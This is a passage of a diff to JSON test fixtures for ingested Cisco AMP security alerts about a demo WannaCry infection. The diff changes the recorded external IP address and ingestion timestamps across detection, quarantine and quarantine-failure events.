Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763963800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2787,7 +2787,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2828,7 +2828,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2838,8 +2838,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025284137Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.763969900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2859,7 +2859,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2904,7 +2904,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2914,8 +2914,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025286500Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.763975900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2935,7 +2935,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2980,7 +2980,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2990,8 +2990,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025288757Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.763980600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3011,7 +3011,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3056,7 +3056,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3066,8 +3066,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025291244Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.763984300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3087,7 +3087,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3150,7 +3150,7 @@ "be5d6279874da315e3080b06083757aad9b32c23" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3167,8 +3167,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025293456Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", + "ingested": "2021-12-09T13:35:39.764004700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3190,7 +3190,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3253,7 +3253,7 @@ "47a9ad4125b6bd7c55e4e7da251e23f089407b8f" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3270,8 +3270,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025295717Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", + "ingested": "2021-12-09T13:35:39.764011100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3293,7 +3293,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3338,7 +3338,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3348,8 +3348,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025298010Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764074200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3369,7 +3369,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3410,7 +3410,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3420,8 +3420,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025300329Z", - "original": 